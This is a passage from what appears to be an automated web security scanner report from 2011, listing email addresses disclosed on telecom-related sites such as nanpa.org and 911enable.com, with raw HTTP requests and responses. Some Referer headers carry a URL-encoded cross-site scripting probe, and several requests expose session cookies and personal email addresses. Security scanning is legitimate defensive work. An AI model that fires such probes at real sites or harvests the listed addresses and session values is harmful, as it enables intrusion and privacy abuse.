<a href="mailto:info@nanpa.org">info@nanpa.org</a>
...[SNIP]...

21.9. http://nanpa.org/education_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/education_overview.php

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@nanpa.org">info@nanpa.org</a>
...[SNIP]...

21.10. http://nanpa.org/history.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/history.php

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@nanpa.org">info@nanpa.org</a>
...[SNIP]...

21.11. http://nanpa.org/javascript/cookieman.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/javascript/cookieman.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/cookieman.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:46 GMT
Server: Apache
Last-Modified: Thu, 30 Oct 2008 19:32:02 GMT
ETag: "b44cbc-4d2-45a7d88f4d080"
Accept-Ranges: bytes
Content-Length: 1234
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: cookieman.js
Desc: Generic cookie manager.
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2002-Oct-2
...[SNIP]...

21.12. http://nanpa.org/javascript/curr_year.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/javascript/curr_year.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/curr_year.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:51 GMT
Server: Apache
Last-Modified: Fri, 31 Oct 2008 21:36:31 GMT
ETag: "b44cd3-15f-45a9363fc15c0"
Accept-Ranges: bytes
Content-Length: 351
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: curr_year.js
Desc: Display the current year
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2007-Apr-
...[SNIP]...

21.13. http://nanpa.org/javascript/external.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/javascript/external.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/external.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:45 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 16:56:37 GMT
ETag: "b44cbf-79b-49a9a7ba69b40"
Accept-Ranges: bytes
Content-Length: 1947
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: external.js
Desc: Generic script to launch external links and PDFs in a new window
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
...[SNIP]...

21.14. http://nanpa.org/javascript/fontsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/javascript/fontsizer.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/fontsizer.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:47 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 09:02:44 GMT
ETag: "b44cbd-7b5-49915a5ed5500"
Accept-Ranges: bytes
Content-Length: 1973
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: fontsizer.js
Desc: Font size manager.
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2008-09-12
Modi
...[SNIP]...

21.15. http://nanpa.org/javascript/gen_mm_object.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/javascript/gen_mm_object.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/gen_mm_object.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:47 GMT
Server: Apache
Last-Modified: Thu, 30 Oct 2008 19:32:03 GMT
ETag: "b44cbe-ce1-45a7d890412c0"
Accept-Ranges: bytes
Content-Length: 3297
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: gen_mm_object.js
Desc: Generate object and param tags for multimedia content based on browser type
Copyright: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
Author:
...[SNIP]...
<jlock@relevantarts.com>
...[SNIP]...

21.16. http://nanpa.org/pullout_menus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/pullout_menus.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /pullout_menus.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:48 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 17:04:08 GMT
ETag: "b4211b-31ab-49b77dec97200"
Accept-Ranges: bytes
Content-Length: 12715
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: pullout_menus.js
Desc: Pullout menu definitions for NANPA
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Creat
...[SNIP]...

21.17. http://nanpa.org/startup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/startup.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /startup.js HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:43 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 20:25:05 GMT
ETag: "b4211c-6a1-49b5271c1ea40"
Accept-Ranges: bytes
Content-Length: 1697
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: startup.js
Desc: Generate Javascript code to include external scripts
Copyright: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
Author: John A. Lock <jlock@relevantarts.com>
...[SNIP]...

21.18. http://netvoipcommunications.com/additional-services.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netvoipcommunications.com
Path:	/additional-services.html

Issue detail

The following email addresses were disclosed in the response:

Info@netvoipcommunications.com
Sales@netvoipcommunications.com
kevin@completedesignandhosting.com

Request

GET /additional-services.html HTTP/1.1
Host: netvoipcommunications.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 09 May 2011 20:25:33 GMT
ETag: "3344d0-45f9-4a2dda4312940"
Accept-Ranges: bytes
Content-Length: 17913
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<meta name="email" content="kevin@completedesignandhosting.com" />
...[SNIP]...
<br />
Info@netvoipcommunications.com<br />
Sales@netvoipcommunications.com </li>
...[SNIP]...

21.19. http://netvoipcommunications.com/js/hoverintent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netvoipcommunications.com
Path:	/js/hoverintent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /js/hoverintent.js HTTP/1.1
Host: netvoipcommunications.com
Proxy-Connection: keep-alive
Referer: http://netvoipcommunications.com/additional-services.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:19 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 09 May 2011 20:25:58 GMT
ETag: "33804a-649-4a2dda5aea180"
Accept-Ranges: bytes
Content-Length: 1609
Connection: close
Content-Type: application/x-javascript

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.20. http://netvoipcommunications.com/pricing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netvoipcommunications.com
Path:	/pricing.html

Issue detail

The following email addresses were disclosed in the response:

Info@netvoipcommunications.com
Sales@netvoipcommunications.com
kevin@completedesignandhosting.com

Request

GET /pricing.html HTTP/1.1
Host: netvoipcommunications.com
Proxy-Connection: keep-alive
Referer: http://netvoipcommunications.com/additional-services.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:51:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 09 May 2011 20:25:37 GMT
ETag: "3344e5-4a9a-4a2dda46e3240"
Accept-Ranges: bytes
Content-Length: 19098
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<meta name="email" content="kevin@completedesignandhosting.com" />
...[SNIP]...
<br />
Info@netvoipcommunications.com<br />
Sales@netvoipcommunications.com </li>
...[SNIP]...

21.21. http://www.911enable.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/

Issue detail

The following email address was disclosed in the response:

info@911enable.com

Request

Response

HTTP/1.1 302 Redirect
Content-Type: text/html; charset=UTF-8
Location: ./business.php
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:13 GMT
Content-Length: 18307

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="./business.php">here</a></body><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

...[SNIP]...
<meta name="reply-To" content="info@911enable.com" />
...[SNIP]...

21.22. http://www.911enable.com/business.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business.php

Issue detail

The following email address was disclosed in the response:

info@911enable.com

Request

GET /business.php HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:14 GMT
Content-Length: 26235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<meta name="Reply-to" content="info@911enable.com" />
...[SNIP]...

21.23. http://www.911enable.com/business/contact_specialist.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business/contact_specialist.php

Issue detail

The following email address was disclosed in the response:

info@911enable.com

Request

Response

21.24. http://www.911enable.com/business/resource_center/knowledge_base.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business/resource_center/knowledge_base.php

Issue detail

The following email address was disclosed in the response:

info@911enable.com

Request

GET /business/resource_center/knowledge_base.php HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/business/contact_specialist.php?provenance=empty
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.8.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=hfsm10lirbv77t05152b4skkf5

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:08:50 GMT
Content-Length: 45398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Temp
...[SNIP]...
<meta name="Reply-to" content="info@911enable.com" />
...[SNIP]...

21.25. http://www.911enable.com/login/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/login/index.php

Issue detail

The following email address was disclosed in the response:

info@911enable.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa DEVa OUR BUS PHY COM NAV INT STA"
Server: 911Enable LA-5
Date: Thu, 12 May 2011 01:06:54 GMT
Content-Length: 18966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- InstanceBegin template="/Tem
...[SNIP]...
<meta name="Reply-to" content="info@911enable.com" />
...[SNIP]...

21.26. http://www.atis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atis.org
Path:	/

Issue detail

The following email addresses were disclosed in the response:

jturner@atis.org
rgoodman@atis.org

Request

Response

21.27. http://www.atis.org/cioc_foss.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atis.org
Path:	/cioc_foss.asp

Issue detail

The following email address was disclosed in the response:

yreigle@atis.org

Request

GET /cioc_foss.asp HTTP/1.1
Host: www.atis.org
Proxy-Connection: keep-alive
Referer: http://www.atis.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASRRCDST=MDEPFBJBKACJBFEFGGLBKAPF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 10852
Content-Type: text/html
Cache-control: private

<HTML><HEAD>
<TITLE>ATIS: CIO Council</TITLE>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<style type="text/css">
</style>
<script src="http://www.atis.org/flashfix.j
...[SNIP]...
<a href="mailto:yreigle@atis.org">yreigle@atis.org</a>
...[SNIP]...

21.28. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

support@voip-info.org

Request

GET /search?sclient=psy&hl=en&biw=1065&bih=964&source=hp&q=lnp+login&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.2,or.r_gc.r_pw.&fp=cc6bcc5982231d65&tch=1&ech=1&psi=TS3LTaDUOqXc0QGA0fSXCQ.1305161039447.5 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=number+porting+lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:44:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: application/json; charset=UTF-8
Content-Disposition: attachment
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 57506

ShjDd-Or....S....L..J.k...?....d..!{e:"Yi3LTfrUPOjz0gGrxNysCg",c:1,u:"http://www.google.com/search?sclient\x3dpsy\x26hl\x3den\x26biw\x3d1065\x26bih\x3d964\x26source\x3dhp\x26q\x3dlnp+login\x26aq\x3df\
...[SNIP]...
cb\\x3e...\\x3c/b\\x3e \\x3cem\\x3eLNP\\x3c/em\\x3e. See \\x3cem\\x3eLocal Number Portability\\x3c/em\\x3e \\x3cb\\x3e...\\x3c/b\\x3e Get a free \\x3cem\\x3elogin\\x3c/em\\x3e here: Register Thanks! - support@voip-info.org \\x26middot; Page Changes | Comments \\x3cb\\x3e...\\x3c/b\\x3e\\x3cbr\\x3e\\x3cspan class\\x3df\\x3e\\x3ccite\\x3ewww.voip-info.org/wiki/view/\\x3cb\\x3eLNP\\x3c/b\\x3e\\x3c/cite\\x3e - \\x3cspan cla
...[SNIP]...

21.29. http://www.job-search-engine.com/assets/js/niftycube.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.job-search-engine.com
Path:	/assets/js/niftycube.js

Issue detail

The following email address was disclosed in the response:

a.fulciniti@html.it

Request

GET /assets/js/niftycube.js HTTP/1.1
Host: www.job-search-engine.com
Proxy-Connection: keep-alive
Referer: http://www.job-search-engine.com/keyword/number-portability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JUJUSESSIONID=a7059a72fdc0ea3bfc8c4acf3d33aa5036b9f9d9; jpp=10; session_id=a7059a72fdc0ea3bfc8c4acf3d33aa5036b9f9d9

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Thu, 12 May 2011 00:45:50 GMT
ETag: "131217e-2453-49e87dc9ea280"
Last-Modified: Tue, 15 Mar 2011 16:24:26 GMT
Server: Apache
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 9299

/* Nifty Corners Cube - rounded corners with CSS and Javascript
Copyright 2006 Alessandro Fulciniti (a.fulciniti@html.it)

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the Li
...[SNIP]...

21.30. http://www.job-search-engine.com/keyword/number-portability/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.job-search-engine.com
Path:	/keyword/number-portability/

Issue detail

The following email address was disclosed in the response:

name@example.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 00:45:54 GMT
Server: CherryPy/3.1.2
Set-Cookie: JUJUSESSIONID=b7da80c1b1571de1738a086cbc20d5e2597a6eea; Path=/
Set-Cookie: jpp=10; Path=/
Set-Cookie: session_id=b7da80c1b1571de1738a086cbc20d5e2597a6eea; expires=Thu, 12 May 2011 01:45:54 GMT; Path=/
Vary: Accept-Encoding
Via: 1.1 www.job-search-engine.com
Connection: keep-alive
Content-Length: 45948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
(this)"
onblur="onEmailBlur(this)"
size="23"
style="color: rgb(153, 153, 153);"
value="name@example.com"
class="subscribeEmail"
type="text"
id="subscribeEmail0"
name="emayl"/>
...[SNIP]...
<script type="text/javascript">
initSubscribeEmail('subscribeEmail0', 'name@example.com');
</script>
...[SNIP]...
(this)"
onblur="onEmailBlur(this)"
size="23"
style="color: rgb(153, 153, 153);"
value="name@example.com"
class="subscribeEmail"
type="text"
id="subscribeEmail1"
name="emayl"/>
...[SNIP]...
<script type="text/javascript">
initSubscribeEmail('subscribeEmail1', 'name@example.com');
</script>
...[SNIP]...

21.31. http://www.nanpa.org/javascript/cookieman.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/javascript/cookieman.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/cookieman.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:41 GMT
Server: Apache
Last-Modified: Thu, 30 Oct 2008 19:32:02 GMT
ETag: "b44cbc-4d2-45a7d88f4d080"
Accept-Ranges: bytes
Content-Length: 1234
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: cookieman.js
Desc: Generic cookie manager.
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2002-Oct-2
...[SNIP]...

21.32. http://www.nanpa.org/javascript/curr_year.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/javascript/curr_year.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/curr_year.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:38 GMT
Server: Apache
Last-Modified: Fri, 31 Oct 2008 21:36:31 GMT
ETag: "b44cd3-15f-45a9363fc15c0"
Accept-Ranges: bytes
Content-Length: 351
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
